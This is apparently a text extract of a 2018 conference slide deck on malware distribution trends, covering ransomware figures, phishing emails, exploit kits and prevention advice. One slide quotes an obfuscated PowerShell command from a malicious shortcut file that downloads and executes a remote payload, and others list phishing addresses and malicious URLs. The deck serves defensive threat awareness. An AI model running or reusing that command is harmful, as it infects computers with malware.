SlideShare a Scribd company logo
1 of 41
Brad Duncan
Palo Alto Networks
MALWARE DISTRIBUTION TRENDS
OCTOBER 2018
Introduction
@malware_traffic
Disclaimer
I focus on mass-
distribution
methods,
not targeted
attacks
Overview
• Types of malware
• Distribution methods
• Prevention strategies
Types of malware
• In wide-scale distribution, we most often find:
• Information stealers / backdoors
• Malware downloaders
• Cryptocurrency miners
• Ransomware
Ransomware
malware that locks
your computer or files
and holds them for
ransom
ransomware
other malware
September 2018 - 1,888,929 samples
142,336
1,746,563
7.5%
Virlock
Gandcrab
Other
Ransomware - 142,366 samples
109,734
20,159
: 12,473
.toqfrx
ENCRYPTED BY GANDCRAB 5.0.4
Gandcrab
Gandcrab
Gandcrab
Gandcrab
Payment amount: 5.32481363 DSH ( $1,000.00 )
Gandcrab
Payment amount: 0.16691958 DSH ( $1,000.00 +10.0% )
...ransomware has moved towards large network-wide
breaches by variants like SamSam, BitPaymer, and
Dharma over publicly exposed remote desktop
services.
Ransomware
This Week in Ransomware – September
28th 2018 – RDP and gandCrab
large network-wide
breaches
publicly exposed remote desktop
services
• In wide-scale distribution, we most often find:
• Information stealers / backdoors
• Malware downloaders
• Cryptocurrency miners
• Ransomware
Types of malware
Up next...
• Types of malware
• Distribution methods
• Prevention strategies
How is malware spread?
• Email
• Social media
• The web
• Worm-style propagation
• Attackers breach networks
Distribution through Email
By volume, email
remains the most
common method
criminals use to
distribute
malware.
• Archives with malware executables
• Microsoft Office documents
• RTF documents that exploit Microsoft Office
• Archives with other types of files
• Links to malware
These emails contain:
Distribution through Email
• Archives with malware executables
• Microsoft Office documents
• RTF documents that exploit Microsoft Office
• Archives with other types of files
• Links to malware
These emails contain:
Distribution through Email
Subject: You've received eFax Message
From: "eFax j2 Global" <efax@flumepsychiatry.com>
Date: Monday, 2018-10-01 17:41 UTC
Distribution through Email
Subject: You've received eFax Message
From: "eFax j2 Global" <efax@flumepsychiatry.com>
Date: Monday, 2018-10-01 17:41 UTC
Distribution through Email
http://pitchbocaraton.com?
82a1=APYBKsCs3LUw
Distribution through Email
Distribution through Email
Subject: Orçamento de produtos [34626] - DAF Incorporadora Ltda
From: <financeiro3386@dafincorp2.mittup.site>
Date: Wednesday, 2018-09-26 07:21 UTC
Distribution through Email
Olá, Bom dia,
Venho por meio desta E-mail solicitar o orçamento
dos produtos especificados na planilha disponível
abaixo.
Obrigado!
- DAF Incorporadora Ltda
Anexo-Orcamento25092018.zip
Distribution through Email
Anexo-
Orcamento25
092018.zip
Oráamento - DAF
Incorporadora Ltda -
5XB3.lnk
Distribution through Email
C:Windowssystem32cmd.exe /V /C
C:WindowsSystem32WindowsPO^WerSHEllv1.0Po
^wErSH^eLL.e^xe -nop -win 1 Get-Member; Get-
NetDomain; Write-Warning 'above cEMO to NJEu a
Emy which dot6wnload and exec6ute the mIHK';
IeX(iEX('(New-{0}ect N{1}bClient)."DowNloAdsTRiNG
"("""{2}.us-east{3}?tk=kkA""")' -f 'Obj’, 'et.We’, 'https://
s3’,’-2.amazonaws.com/knoimeldlapasta/marai.bmp
'));Get-NetDomain
Distribution through Social Media
Distribution through Social Media
好好玩儿! 好好学习! | 7:30 PM
ッヨー http://www.bit.ly/23rp4hn?profile_image=
Today
Distribution through the Web
Distribution through the Web
Unexpected web pages
or pop-up windows
Exploit kits
Distribution through the Web
Distribution through the Web
criminal's malware
user's computer
Exploit Kits
Exploit kits are web servers that
use exploits to take advantage of
vulnerabilities in browser-based
applications to infect a Windows
computer without the user's
knowledge.
Exploit Kits
• Flash player
• Web browser
• Silverlight
• Java, PDF
Exploit Kits
Normal
website
MALICIOUS AD
GATE
Exploit
kit
server
Exploit Kits
Up next...
• Types of malware
• Distribution methods
• Prevention strategies
Prevention Strategies
• Keep regular backups of
critical data and test them.
• Training and awareness.
• Keep your systems up-to-date
and fully patched.
• Threat detection, prevention
and protection solutions.
Summary
• Types of malware
• Distribution methods
• Prevention strategies
Brad Duncan
Threat Intelligence Analyst
Thank you!
MALWARE DISTRIBUTION TRENDS
OCTOBER 2018

More Related Content

Similar to MNSEC 2018 - Malware Distribution Trends, October 2018

Future-proof your business - West Sussex Recover & Rise S4W2
Future-proof your business - West Sussex Recover & Rise S4W2Future-proof your business - West Sussex Recover & Rise S4W2
Future-proof your business - West Sussex Recover & Rise S4W2Annie-Marie Page
 
2021 01-13 reducing risk-of_ransomware
2021 01-13 reducing risk-of_ransomware2021 01-13 reducing risk-of_ransomware
2021 01-13 reducing risk-of_ransomwareAlgoSec
 
Securing your web infrastructure
Securing your web infrastructureSecuring your web infrastructure
Securing your web infrastructureWP Engine
 
Protect your domain with DMARC
Protect your domain with DMARCProtect your domain with DMARC
Protect your domain with DMARCContactlab
 
Cybersecurity breakfast tour 2013 (1)
Cybersecurity breakfast tour 2013 (1)Cybersecurity breakfast tour 2013 (1)
Cybersecurity breakfast tour 2013 (1)Infradata
 
Crypto trap for social media 9.4.2016
Crypto trap for social media 9.4.2016Crypto trap for social media 9.4.2016
Crypto trap for social media 9.4.2016Michael Zuckerman
 
Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...
Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...
Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...TigerGraph
 
Scaling service provider business with DDoS-mitigation-as-a-service
Scaling service provider business with DDoS-mitigation-as-a-serviceScaling service provider business with DDoS-mitigation-as-a-service
Scaling service provider business with DDoS-mitigation-as-a-serviceCloudflare
 
Ransomware webinar may 2016 final version external
Ransomware webinar   may 2016 final version externalRansomware webinar   may 2016 final version external
Ransomware webinar may 2016 final version externalZscaler
 
Akila srinivasan microsoft-bug_bounty-(publish)
Akila srinivasan microsoft-bug_bounty-(publish)Akila srinivasan microsoft-bug_bounty-(publish)
Akila srinivasan microsoft-bug_bounty-(publish)PacSecJP
 
The Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDC
The Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDCThe Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDC
The Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDCCloudflare
 
Everything You Need to Know About Crypto
Everything You Need to Know About CryptoEverything You Need to Know About Crypto
Everything You Need to Know About CryptoAggregage
 
Cyber Security and the Impact on your Business
Cyber Security and the Impact on your BusinessCyber Security and the Impact on your Business
Cyber Security and the Impact on your BusinessLucy Denver
 
Fighting Email Abuse with DMARC
Fighting Email Abuse with DMARCFighting Email Abuse with DMARC
Fighting Email Abuse with DMARCKurt Andersen
 
DDoS Attacks in 2020 & Best Practices in Defense
DDoS Attacks in 2020 & Best Practices in DefenseDDoS Attacks in 2020 & Best Practices in Defense
DDoS Attacks in 2020 & Best Practices in DefenseNETSCOUT
 
Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'
Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'
Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'Chris Hails
 
All your files now belong to us
All your files now belong to usAll your files now belong to us
All your files now belong to usPeter Wood
 
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCDefending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCCloudflare
 

Similar to MNSEC 2018 - Malware Distribution Trends, October 2018 (20)

Future-proof your business - West Sussex Recover & Rise S4W2
Future-proof your business - West Sussex Recover & Rise S4W2Future-proof your business - West Sussex Recover & Rise S4W2
Future-proof your business - West Sussex Recover & Rise S4W2
 
2021 01-13 reducing risk-of_ransomware
2021 01-13 reducing risk-of_ransomware2021 01-13 reducing risk-of_ransomware
2021 01-13 reducing risk-of_ransomware
 
Securing your web infrastructure
Securing your web infrastructureSecuring your web infrastructure
Securing your web infrastructure
 
Protect your domain with DMARC
Protect your domain with DMARCProtect your domain with DMARC
Protect your domain with DMARC
 
Cybersecurity breakfast tour 2013 (1)
Cybersecurity breakfast tour 2013 (1)Cybersecurity breakfast tour 2013 (1)
Cybersecurity breakfast tour 2013 (1)
 
Crypto trap for social media 9.4.2016
Crypto trap for social media 9.4.2016Crypto trap for social media 9.4.2016
Crypto trap for social media 9.4.2016
 
Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...
Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...
Graph Gurus Episode 34: Graph Databases are Changing the Fraud Detection and ...
 
Crowdsourced Vulnerability Testing
Crowdsourced Vulnerability TestingCrowdsourced Vulnerability Testing
Crowdsourced Vulnerability Testing
 
Scaling service provider business with DDoS-mitigation-as-a-service
Scaling service provider business with DDoS-mitigation-as-a-serviceScaling service provider business with DDoS-mitigation-as-a-service
Scaling service provider business with DDoS-mitigation-as-a-service
 
Ransomware webinar may 2016 final version external
Ransomware webinar   may 2016 final version externalRansomware webinar   may 2016 final version external
Ransomware webinar may 2016 final version external
 
Akila srinivasan microsoft-bug_bounty-(publish)
Akila srinivasan microsoft-bug_bounty-(publish)Akila srinivasan microsoft-bug_bounty-(publish)
Akila srinivasan microsoft-bug_bounty-(publish)
 
The Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDC
The Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDCThe Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDC
The Morphing DDoS and Bot Landscape: Featuring Guest Speaker from IDC
 
Everything You Need to Know About Crypto
Everything You Need to Know About CryptoEverything You Need to Know About Crypto
Everything You Need to Know About Crypto
 
Cyber Security and the Impact on your Business
Cyber Security and the Impact on your BusinessCyber Security and the Impact on your Business
Cyber Security and the Impact on your Business
 
Fighting Email Abuse with DMARC
Fighting Email Abuse with DMARCFighting Email Abuse with DMARC
Fighting Email Abuse with DMARC
 
DDoS Attacks in 2020 & Best Practices in Defense
DDoS Attacks in 2020 & Best Practices in DefenseDDoS Attacks in 2020 & Best Practices in Defense
DDoS Attacks in 2020 & Best Practices in Defense
 
Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'
Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'
Auckland (ISC)2 Chapter - Building the ‘Bob Semple Cyber Tank'
 
All your files now belong to us
All your files now belong to usAll your files now belong to us
All your files now belong to us
 
MSWINWIRE
MSWINWIREMSWINWIRE
MSWINWIRE
 
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCDefending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
 

More from MNCERT

MNSEC 2018 - Threat Intel Sharing from a CSIRT Standpoint
MNSEC 2018 - Threat Intel Sharing from a CSIRT StandpointMNSEC 2018 - Threat Intel Sharing from a CSIRT Standpoint
MNSEC 2018 - Threat Intel Sharing from a CSIRT StandpointMNCERT
 
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNSEC 2018 -  Observations from the APNIC Community Honeynet Project MNSEC 2018 -  Observations from the APNIC Community Honeynet Project
MNSEC 2018 - Observations from the APNIC Community Honeynet Project MNCERT
 
MNSEC 2018 - Active Directory - how not to
MNSEC 2018 - Active Directory - how not toMNSEC 2018 - Active Directory - how not to
MNSEC 2018 - Active Directory - how not toMNCERT
 
MNSEC 2018 - Mongolian Internet Healthiness
MNSEC 2018 - Mongolian Internet HealthinessMNSEC 2018 - Mongolian Internet Healthiness
MNSEC 2018 - Mongolian Internet HealthinessMNCERT
 
MNSEC 2018- FortiGuard Lab’s Threat Landscape Highlights
MNSEC 2018-  FortiGuard Lab’s Threat Landscape Highlights MNSEC 2018-  FortiGuard Lab’s Threat Landscape Highlights
MNSEC 2018- FortiGuard Lab’s Threat Landscape Highlights MNCERT
 
MNSEC 2018 - Evolving DDoS Threat Landscape
MNSEC 2018 - Evolving DDoS Threat LandscapeMNSEC 2018 - Evolving DDoS Threat Landscape
MNSEC 2018 - Evolving DDoS Threat LandscapeMNCERT
 
MNSEC 2018 - Windows forensics
MNSEC 2018 - Windows forensicsMNSEC 2018 - Windows forensics
MNSEC 2018 - Windows forensicsMNCERT
 
MNSEC 2018 - Linux hardening
MNSEC 2018 - Linux hardeningMNSEC 2018 - Linux hardening
MNSEC 2018 - Linux hardeningMNCERT
 
MNSEC 2018 - Cryptography
MNSEC 2018 - CryptographyMNSEC 2018 - Cryptography
MNSEC 2018 - CryptographyMNCERT
 
MNSEC 2018 - MNCERT REPORT
MNSEC 2018 - MNCERT REPORTMNSEC 2018 - MNCERT REPORT
MNSEC 2018 - MNCERT REPORTMNCERT
 
MNSEC 2018 - Data center security
MNSEC 2018 - Data center securityMNSEC 2018 - Data center security
MNSEC 2018 - Data center securityMNCERT
 
MNSEC 2018 - Information security in blockchain
MNSEC 2018 - Information security in blockchainMNSEC 2018 - Information security in blockchain
MNSEC 2018 - Information security in blockchainMNCERT
 

More from MNCERT (12)

MNSEC 2018 - Threat Intel Sharing from a CSIRT Standpoint
MNSEC 2018 - Threat Intel Sharing from a CSIRT StandpointMNSEC 2018 - Threat Intel Sharing from a CSIRT Standpoint
MNSEC 2018 - Threat Intel Sharing from a CSIRT Standpoint
 
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNSEC 2018 -  Observations from the APNIC Community Honeynet Project MNSEC 2018 -  Observations from the APNIC Community Honeynet Project
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
 
MNSEC 2018 - Active Directory - how not to
MNSEC 2018 - Active Directory - how not toMNSEC 2018 - Active Directory - how not to
MNSEC 2018 - Active Directory - how not to
 
MNSEC 2018 - Mongolian Internet Healthiness
MNSEC 2018 - Mongolian Internet HealthinessMNSEC 2018 - Mongolian Internet Healthiness
MNSEC 2018 - Mongolian Internet Healthiness
 
MNSEC 2018- FortiGuard Lab’s Threat Landscape Highlights
MNSEC 2018-  FortiGuard Lab’s Threat Landscape Highlights MNSEC 2018-  FortiGuard Lab’s Threat Landscape Highlights
MNSEC 2018- FortiGuard Lab’s Threat Landscape Highlights
 
MNSEC 2018 - Evolving DDoS Threat Landscape
MNSEC 2018 - Evolving DDoS Threat LandscapeMNSEC 2018 - Evolving DDoS Threat Landscape
MNSEC 2018 - Evolving DDoS Threat Landscape
 
MNSEC 2018 - Windows forensics
MNSEC 2018 - Windows forensicsMNSEC 2018 - Windows forensics
MNSEC 2018 - Windows forensics
 
MNSEC 2018 - Linux hardening
MNSEC 2018 - Linux hardeningMNSEC 2018 - Linux hardening
MNSEC 2018 - Linux hardening
 
MNSEC 2018 - Cryptography
MNSEC 2018 - CryptographyMNSEC 2018 - Cryptography
MNSEC 2018 - Cryptography
 
MNSEC 2018 - MNCERT REPORT
MNSEC 2018 - MNCERT REPORTMNSEC 2018 - MNCERT REPORT
MNSEC 2018 - MNCERT REPORT
 
MNSEC 2018 - Data center security
MNSEC 2018 - Data center securityMNSEC 2018 - Data center security
MNSEC 2018 - Data center security
 
MNSEC 2018 - Information security in blockchain
MNSEC 2018 - Information security in blockchainMNSEC 2018 - Information security in blockchain
MNSEC 2018 - Information security in blockchain
 

Recently uploaded

Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 

Recently uploaded (20)

Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 

MNSEC 2018 - Malware Distribution Trends, October 2018